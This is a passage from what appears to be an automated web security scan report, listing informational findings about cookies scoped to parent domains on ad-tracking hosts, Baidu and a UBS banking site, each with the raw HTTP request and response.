Set-Cookie: rsiPus_feb9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TE1N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RXmH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Jawe="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 06 Jul 2011 14:01:39 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

9.6. http://adx.adnxs.com/mapuid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adx.adnxs.com
Path:   /mapuid

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=181&user=CAESECFrKvBlT-cBj-xM8B2ECfY&cver=1 HTTP/1.1
Host: adx.adnxs.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIvoIBEAoYASABKAEw3eiy8AQQ3eiy8AQYAA..; sess=1; uuid2=3420415245200633085; anj=Kfw)lBAbL-*cOV4KBhCoR25DY(2vp1RESM(2J.fYtvlqPT[cJfVZWo!V7]TG9T)_>#0+zM2gLr6r'WB<PBs]9<X5zx]>^#n%)np%pON9vhK:9sozd5e72axY9NVZ-Im3Zl[S6U?nDk]]Xl0Xr0'9Q2+(5tDV>!8=:3mY$vNb@+D3Ap?G2CBJ4BAix#<U2/j@vzKW10dnb=eCp5B>h>13URKjY5=1]w9C4HMCvuXQGV:it%G2`n9'(TGCQPS<$z^e]Z6NT!6(]HiUVWS)l>c@S8hzH=`<c`vTNPHYaQatBmG@L<igeF=L:^rOE'Hh@#EVR.`=Ux-/<GuTk06++UaGeq'fCBda.X#5PD%g*pg(D*8cY.faZU4k(iYnRV)LFflEn[fHA_LLir)NJ*<UER3ZsiPR>'5esbJ6E8wJTgDvz0]o5KL#F%J7s%dO.T8<793E1psbJ#N3F[i-tl_w_uU>pc>OI(54nFrLmI9z-JW>V/5Y17SfF#Dw)<8nEGEcWzw+u%cChmb4sj7vmp8Od3LAg``vx]:q5^0bCr_Cf.Fhu[tN+9H5I9@_tH4p>Gujl>i$HGt4v8Sw>Lr<m=^M?dyN<JFq0>r=MRS4E+.tPFsOwox/t_9W(AW))oO^b9Xw!u2#qD12xd^$tmhgU5n.:$%hL+W<DJ<:Pz0B98#Xqpp?6Wy9Oa3_U!_mQ0wXAsekf4^D8rmfvGk2vLba!V(^MK7<<jaaH$q-TUqB'0!$_/J2aEL.bEnn+lmE)fcs3@JzL-8_qNIb.7`cZ4G#S'Y?4)j9xsUji[+!jWL:^kCTR)%?W^

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 07-Jul-2011 15:39:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Tue, 04-Oct-2011 15:39:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Tue, 04-Oct-2011 15:39:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)lBAbL-*cOV4KBhCoR25DY(2vp1RESM(2J.fYtvlqPT[cJfVZWo!V7]TG9T)_>#0+zM2gLr6r'WB<PBs]9<X5zx]>^#n%)np%pON9vhK:9sozd5e72axY9NVZ-Im3Zl[S6U?nDk]]Xl0Xr0'9Q2+(5tDV>!8=:3mY$vNb@+D3Ap?G2CBJ4BAix#<U2/j@vzKW10dnb=eCp5B>h>13URKjY5=1]w9C4HMCvuXQGV:it%G2`n9'(TGCQPS<$z^e]Z6NT!6(]HiUVWS)l>c@S8hzH=`<c`vTNPHYaQatBmG@L<igeF=L:^rOE'Hh@#EVR.`=Ux-/<GuTk06++UaGeq'fCBda.X#5PD%g*pg(D*8cY.faZU4k(iYnRV)LFflEn[fHA_LLir)NJ*<UER3ZsiPR>'5esbJ6E8wJTgDvz0]o5KL#F%J7s%dO.T8<793E1psbJ#N3F[i-tl_w_uU>pc>OI(54nFrLmI9z-JW>V/5Y17SfF#Dw)<8nEGEcWzw+u%cChmb4sj7vmp8Od3LAg``vx]:q5^0bCr_Cf.Fhu[tN+9H5I9@_tH4p>Gujl>i$HGt4v8Sw>Lr<m=^M?dyN<JFq0>r=MRS4E+.tPFsOwox/t_9W(AW))oO^b9Xw!u2#qD12xd^$tmhgU5n.:$%hL+W<DJ<:Pz0B98#Xqpp?6Wy9Oa3_U!_mQ0wXAsekf4^D8rmfvGk2vLba!V(^MK7<<jaaH$q-TUqB'0!$_/J2aEL.bEnn+lmE)fcs3@JzL-8_qNIb.7`cZ4G#S'Y?4)j9xsUji[+!jWL:^kCTR)%?W^; path=/; expires=Tue, 04-Oct-2011 15:39:08 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Wed, 06 Jul 2011 15:39:08 GMT

GIF89a.............!.......,........@..L..;

9.7. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=6635176&rn=1308436746&c7=http%3A%2F%2Fbcp.crwdcntrl.net%2F4%2Fc%3D34%257Crand%3D395066690%257Cpv%3Dy%257Crt%3Difr&c9=http%3A%2F%2Fwww.bebo.com%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/4/c=34%7Crand=395066690%7Cpv=y%7Crt=ifr
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Wed, 06 Jul 2011 11:22:09 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Fri, 05-Jul-2013 11:22:09 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


9.8. http://b.scorecardresearch.com/p

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p HTTP/1.1
Host: b.scorecardresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Length: 0
Location: http://b.scorecardresearch.com/p2?
Date: Wed, 06 Jul 2011 11:21:27 GMT
Connection: close
Set-Cookie: UID=845ba2-96.6.41.192-1309951287; expires=Fri, 05-Jul-2013 11:21:27 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


9.9. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5650363~~0~~~^ebAdDuration~899~0~01020&OptOut=0&ebRandom=0.8620431364979595&flv=10.3181&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309951294291&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_Home_300x250_ATFLeft&page_slots=Bebo_Home_300x250_ATFLeft&cust_params=Age%3D&cookie=ID%3D5d1731d2d654c623%3AT%3D1309951294%3AS%3DALNI_MYs8-PBIDTpzhXnmr-Aos6FdpkB-w&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2F&lmt=1309969296&dt=1309951296825&cc=65&biw=1057&bih=822&ifi=1&adk=491404383&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&flash=10.3.181&gads=v2&ga_vid=570193707.1309951297&ga_sid=1309951297&ga_hid=2099858697
Origin: http://pubads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=6d1502f0-782c-4c66-9617-aa4652ec4df13IV010; expires=Tue, 04-Oct-2011 07:36:40 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=10.3181&RES=128&WMPV=0; expires=Tue, 04-Oct-2011 07:36:40 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 06 Jul 2011 11:36:39 GMT
Connection: close
Content-Length: 0


9.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: A3 and B3 (domain=.serving-sys.com). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2800593&PluID=0&w=300&h=250&ncu=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3tv7QUUUTsa3EM_ylAekkezuAa3mhMIBo5ejqBCFk__xOwAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi0xNzY3NDYzNTAzNTIwODY3oAGrl7rtA7IBDHd3dy5iZWJvLmNvbboBCjMwMHgyNTBfYXPIAQnaARRodHRwOi8vd3d3LmJlYm8uY29tL5gCxBPAAgXIApWysAvgAgDqAhlCZWJvX0hvbWVfMzAweDI1MF9BVEZMZWZ0qAMB6APCBOgD0wHoA_gD9QMAAIDB4AQBgAbPpJns29D66cwB%26num%3D1%26sig%3DAGiWqtwsO8bMZJ6jQcjqukrS_j5W81cmAg%26client%3Dca-pub-1767463503520867%26adurl%3Dhttp%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJyrVjI2VrJSMDI1NDHQUVAyNgJyzCwNzM1BPEMgRykkI8gtMNDR1d0i0ts0JCfAI6XYs8DR1lYJpBykwNzUyMAcxAPpNQHSpiAzDA0tgUwTIDOvNCcHyDQDiRobWBjXAgC0CRj.%2526redirectURL%253D&ord=ThRFQQAEG8YK5TlPHdsIpA==&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309951294291&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_Home_300x250_ATFLeft&page_slots=Bebo_Home_300x250_ATFLeft&cust_params=Age%3D&cookie=ID%3D5d1731d2d654c623%3AT%3D1309951294%3AS%3DALNI_MYs8-PBIDTpzhXnmr-Aos6FdpkB-w&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2F&lmt=1309969296&dt=1309951296825&cc=65&biw=1057&bih=822&ifi=1&adk=491404383&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&flash=10.3.181&gads=v2&ga_vid=570193707.1309951297&ga_sid=1309951297&ga_hid=2099858697
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; ActivityInfo=000dg4csN%5f000db5csN%5f000tbQcu6%5f000rFIcsM%5f000tbRcu6%5f; A3=gs35b0E.0ca7000009bExaZS0084o00002h8evaYRd0bI400000kYwuaZXq09MY00001kSEGaZWa03sY00001lp66b0xe0dMv00002lGhvb0Ah0cEt00003kPIlaZWa03sY00000kFaLa.2L09EZ00001jem9a.2L0c7wa.2L1kHgIb0v.02WG00001kLQDb0xt0cbO00001lEOyaYx40cie00001h51Tb0yn0ca700002eBxyaZST03iw00001h4.ob0xr0ca700002hePeb0wK0cbO00001l7XCa+WC08Y500001lzuRa+WF0ckj00001h4.pb0vz0ca700001h51Sb0Ah0ca700001lFP5aZRG0dSu00001lkqFa.2B06hH00001leMha.2F06hH00001jmcDa.2B0c7w00001jDBSaZUd0cbS00001kovFb0xt0cjc00002l.wtb0wj07Nz00001kSCsaZWb03sY00001le66b1nb02WG00001lGkWb0vy0cEt00001jmdZa.2F0c7w00001jDDva+WC0cbS00001jDCqa+WC0cbS00001hePyb0xq0cbO00001lu2rb0yg04m400001gs36b0xr0ca700000iyQIaYRd0bnA00001lu0naYvn0czN00002iz3QaZRG0bnA00001; B3=78ox0000000001vc835N0000000001vjanad0000000001vc990p0000000001v5atH70000000001vfawTK0000000002vjaFbT0000000001vmaKr10000000001vjaJmE0000000001vcajpm0000000001vcajpn0000000000vc9l7u0000000001vf8SCH0000000001vcamoJ0000000001v59xv30000000001vf9xvo0000000001vc82MD0000000003vjaF580000000001vk82MC0000000003vkaAsi0000000001vf9xv40000000001vf8n.z0000000000v9afgy0000000001vf838g0000000001vj9yJj0000000001vj8SC30000000001v982ME0000000000vjaHLh0000000001vfaF7y0000000002v89u4N0000000002vj838c0000000001vjawPH0000000001vf9.360000000001v89i8L0000000001vf82MA0000000000vkajpj0000000001vc90mq0000000001v54ZUH0000000002vc7dNF0000000001vjaKr20000000003vk

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=gs35b0E.0ca7000009bExaZS0084o00002kYwuaZXq09MY00001h8evaYRd0bI400000lGhvb0Ah0cEt00003lp66b0xe0dMv00002kSEGaZWa03sY00001kPIlaZWa03sY00000kHgIb0v.02WG00001jem9a.2L0c7wa.2L1kFaLa.2L09EZ00001lEOyaYx40cie00001kLQDb0xt0cbO00001h4.ob0xr0ca700002eBxyaZST03iw00001h51Tb0yn0ca700002h51Sb0Ah0ca700001h4.pb0vz0ca700001lzuRa+WF0ckj00001l7XCa+WC08Y500001hePeb0wK0cbO00001lzuXb3sV0ckj00001leMha.2F06hH00001lkqFa.2B06hH00001lFP5aZRG0dSu00001kovFb0xt0cjc00002jDBSaZUd0cbS00001jmcDa.2B0c7w00001kSCsaZWb03sY00001l.wtb0wj07Nz00001jDCqa+WC0cbS00001jDDva+WC0cbS00001jmdZa.2F0c7w00001lGkWb0vy0cEt00001le66b1na02WG00001hePyb0xq0cbO00001gs36b0xr0ca700000lu2rb0yg04m400001iz3QaZRG0bnA00001iyQIaYRd0bnA00001; expires=Tue, 04-Oct-2011 07:21:39 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=78ox0000000001vcawTK0000000002vjatH70000000001vf990p0000000001v5anad0000000001vc835N0000000001vjajpm0000000001vcaJmE0000000001vcaKr10000000001vjaFbT0000000001vm9l7u0000000001vfajpn0000000000vcamoJ0000000001v58SCH0000000001vc9xv30000000001vf9xvo0000000001vc82MD0000000003vj838g0000000001vjafgy0000000001vf8n.z0000000000v99xv40000000001vfaAsi0000000001vf82MC0000000003vkaF580000000001vk9yJj0000000001vj82ME0000000000vj8SC30000000001v99u4N0000000002vjaF7y0000000002v8aHLh0000000002vs9i8L0000000001vf9.360000000001v8awPH0000000001vf838c0000000001vjaKr20000000003vk7dNF0000000001vj4ZUH0000000002vc90mq0000000001v5ajpj0000000001vc82MA0000000000vk; expires=Tue, 04-Oct-2011 07:21:39 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 06 Jul 2011 11:21:39 GMT
Connection: close
Content-Length: 2366

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

9.11. http://bstats.adbrite.com/adserver/behavioral-data/0

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /adserver/behavioral-data/0

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: ut and vsd (domain=.adbrite.com). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/behavioral-data/0?d=48272602;bapid=12553;uid=1030306;neg=1 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; rb=0:684339:20838240:110:0:712156:20861280:1voofy6a0tk1w:0:712181:20838240:WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0:762701:20861280:E3F32BD05A8DDF4D5646D79640088B:0:806205:20882880:9ed3f2f2-7f5a-11e0-a07a-00259009a9e4:0; cv="1%3Aq1ZyLi0uyc91zUtWslLKMM%2B1rEnPKzHNt0wsqTG2MixKzSgxsDK0MtDJSMoyqkkvyKoqTy5IrjG0MizJqyjIsDK1MszPq1CqBQA%3D"; srh="1%3Aq64FAA%3D%3D"; rb2=CiMKBjc0MjY5NxjY6J2rHyITNDMyNTg5NzI4OTgzNjQ4MTgzMAouCgY3NjI3MDEYva3q3iYiHkUzRjMyQkQwNUE4RERGNEQ1NjQ2RDc5NjQwMDg4QhAB; ut="1%3AVZJJtoMgEEX3wtgB2KBmN4oabFCgVKIxe%2F80nn%2BS6T116z1K32iP0eONxvYwi24APRB0rDsvsuZ7Ly9y4UsDxhEU4mguoiuZJI5GEth6WKCf6%2BgB4xPtD9ru1sWpzL5hOtvJiReVh25X5Xdh44E%2BtbK7AOd0%2FtKy0Uatx8j4rXVUWM2IsgugU1PmQSMDUNOWWoXUpgggwS%2FqJuY4tFbbYEqbxDJRByBzsViFQd4GhajSK6LVodzcMffQupnioJTLq%2FBgWMKEmcTqlS0UU6o5bVNIJbmL9Rt3KSmF4V9RvhgJxTRj7r7wGsr6PgEvngpz6ab6M%2FuByy8ccm5E7AIovgPgqQ8WvqIKASJR7nqai%2FhKL%2BgiyOTiF4k5jAAdBh8nuH8pilBdzXOre%2F9joM%2FnDw%3D%3D"; vsd=0@1@4e144551@bcp.crwdcntrl.net

Response

HTTP/1.1 200 OK
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: ut="1%3AVZJJtoMgEEX3wtgB2KBmN4oabFCgVKIxe%2F80nn%2BS6T116z1K32iP0eONxvYwi24APRB0rDsvsuZ7Ly9y4UsDxhEU4mguoiuZJI5GEth6WKCf6%2BgB4xPtD9ru1sWpzL5hOtvJiReVh25X5Xdh44E%2BtbK7AOd0%2FtKy0Uatx8j4rXVUWM2IsgugU1PmQSMDUNOWWoXUpgggwS%2FqJuY4tFbbYEqbxDJRByBzsViFQd4GhajSK6LVodzcMffQupnioJTLq%2FBgWMKEmcTqlS0UU6o5bVNIJbmL9Rt3KSmF4V9RvhgJxTRj7r7wGsr6PgEvngpz6ab6M%2FuByy8ccm5E7AIovgPgqQ8WvqIKASJR7nqai%2FhKL%2BgiyOTiF4k5jAAdBh8nuH8pilBdzXOre%2F9joM%2FnDw%3D%3D"; path=/; domain=.adbrite.com; expires=Sat, 03-Jul-2021 15:39:06 GMT
Set-Cookie: vsd=0@2@4e14819a@view.atdmt.com; path=/; domain=.adbrite.com; expires=Fri, 08-Jul-2011 15:39:06 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Wed, 06 Jul 2011 15:39:06 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

9.12. http://cang.baidu.com/do/add

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cang.baidu.com
Path:   /do/add

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: BAIDUID (domain=.baidu.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /do/add?it=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&iu=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&fr=ien&dc= HTTP/1.1
Host: cang.baidu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:26 GMT
Server: apache 1.0.9.0
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Set-Cookie: BAIDUID=92E2D2F2A0513651099D245A96DCDBBE:FG=1; expires=Wed, 06-Jul-41 11:21:26 GMT; path=/; domain=.baidu.com
Content-Type: text/html
Cache-Control: no-cache
Connection: close
Content-Length: 7393

<?xml version="1.0" encoding="gb2312"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xh
...[SNIP]...

9.13. http://clk.atdmt.com/MRT/go/285207471/direct/01/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /MRT/go/285207471/direct/01/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: ach00 and ach01 (domain=.atdmt.com). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /MRT/go/285207471/direct/01/ HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://view.atdmt.com/action/atlasdmt_home
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=903d/120af:6cf8/2750d:d99f/1afe8:bab9/11176:ba67/1c4e:f594/1c01f:66c2/39a1:66c2/3877; expires=Friday, 05-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=ce81a74/120af/134f208a/903d/4dd2907e:cf0807d/2750d/135a6ad5/6cf8/4de0ff1b:8a892c1/1afe8/bfedd64/d99f/4de0ffc1:a34fe32/11176/ab3574a/bab9/4de6e487:224f750/1c4e/4919ce6/ba67/4de6e67b:421378c/1c01f/825b020/f594/4de7e7e5:421378c/1c01f/8b4ca16/f594/4de7e7e7:421378c/1c01f/88b46ce/f594/4de7ecb3:c62bb85/39a1/123ee4af/66c2/4dfffb75:c388719/39a1/1235b344/66c2/4e008e93:c3ee9ca/3877/123ee6eb/66c2/4e008f9b; expires=Friday, 05-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Wed, 06 Jul 2011 11:40:44 GMT
Connection: close


9.14. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: uid (Domain=.p-td.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/ HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://p.brilig.com/contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=3831&action=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8496530639253255806

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8496530639253255806; Domain=.p-td.com; Expires=Mon, 02-Jan-2012 11:21:57 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Wed, 06 Jul 2011 11:21:56 GMT

GIF89a.............!.......,...........D..;

9.15. https://ebanking.ubs.com/en/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ebanking.ubs.com
Path:   /en/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: NavLB_EB (Domain=.ubs.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/ HTTP/1.1
Host: ebanking.ubs.com
Connection: keep-alive
Referer: http://www.ubs.com/1/e/online.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; NavLB_PQ=quotes-public1.ubs.com; ubslang=en-US; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309982088978:ss=1309981804815

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:59:55 GMT
Server: Apache
Pragma: no-cache
Set-Cookie: NavLB_EB=ebanking1.ubs.com; Domain=.ubs.com; Path=/; Version=1; HttpOnly
Connection: close
Location: https://ebanking1.ubs.com:443/en/?NavLB_EB=1309960795
Cache-Control: no-cache
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 286
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
